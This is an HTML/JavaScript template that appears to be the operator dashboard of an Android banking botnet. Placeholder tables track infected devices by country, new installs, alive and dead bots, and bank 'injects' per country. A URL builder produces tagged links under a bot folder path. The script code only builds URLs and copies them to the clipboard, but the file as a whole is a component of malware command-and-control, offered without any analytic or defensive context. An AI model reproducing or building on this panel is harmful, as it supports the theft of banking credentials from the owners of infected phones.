<script>
	
function copyUrl()
{

	var dom = $('#domain').val()
	if(dom.trim() == "" || dom.indexOf('.') == -1 || dom.length < 3)
	{
		$('#url').html("<b style='color: darkred'>Bad domain name</b>")
		return
	}
	
	var tag = $('#tag').val()
	
	var url = 'https://' + dom + '/%BOT_FOLDER%/%STATS_FOLDER%/'
	
	if(tag.trim() != "")
	{
		url += '?tag=' + tag
	}
	
	$('#url').html("<a href='"+url+"'>"+url+"</a> <b>Copied!</b>")
	copyToClip(url)
}

function copyToClip(data)
{
	var tempInput = document.createElement("input");
	tempInput.style = "position: absolute; left: -1000px; top: -1000px";
	tempInput.value = data;
	document.body.appendChild(tempInput);
	tempInput.select();
	document.execCommand("copy");
	document.body.removeChild(tempInput);
}
</script>

<div class="row">
	<!-- left pane -->
	<div class="col-lg-6">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Anonymous Stats URL Builder</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-3">Put domain here:</div>
					<div class="col-md-4"><input id='domain' placeholder='test.com' type='text' class='form-control' value='' /></div>
					<div class="col-md-3"><select id='tag' class="form-control input-sm" style="font-size: 10pt; margin-top: 10px" name='tag'>%TAGS_OPTS%</select></div>
					<div class="col-md-2"><button type='button' onclick='copyUrl()' class='btn btn-primary'>Copy URL</button></div>
				</div>
				<div class="row">
					<div class="col-md-12">&nbsp;<span id='url'></span></div>
				</div>

			</div>
		</div>
	</div>
</div>

<div class="row">
	<!-- left pane -->
	<div class="col-lg-6">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Statistics by last seen time</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="100">Country</th>
								<th>Total</th>
								<th>Installed today</th>
								<th title='Seen in last hour'>Alive</th>
								<th>Offline</th>
								<th title='Offline more than 48h'>Dead</th>
							</tr>
							%BOT_STATS_COUNTRY%
						</table>
						
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="col-lg-3">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Top by lifetime</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="30">ID</th>
								<th>Android</th>
								<th>Time</th>
							</tr>
							%BOT_STATS_LIFETIME%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>

	<div class="col-lg-3">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Statistics by country/injects</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="30">Country</th>
								<th>Injects</th>
							</tr>
							%BOT_STATS_BANKS%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>
	
</div>

<div class="row">

	<div class="col-lg-12">
		<div class="panel panel-default">
			<div class="panel-heading">
				<h3 class="panel-title">Statistics by tags</h3>
			</div>
			<div class="panel-body">
				<div class="row">
					<div class="col-md-12">
						<table class="table table-bordered">
							<tr>
								<th width="30">Tag</th>
								<th>Countries</th>
							</tr>
							%BOT_STATS_TAG%
						</table>
					</div>
				</div>
			</div>
		</div>
	</div>
	
</div>














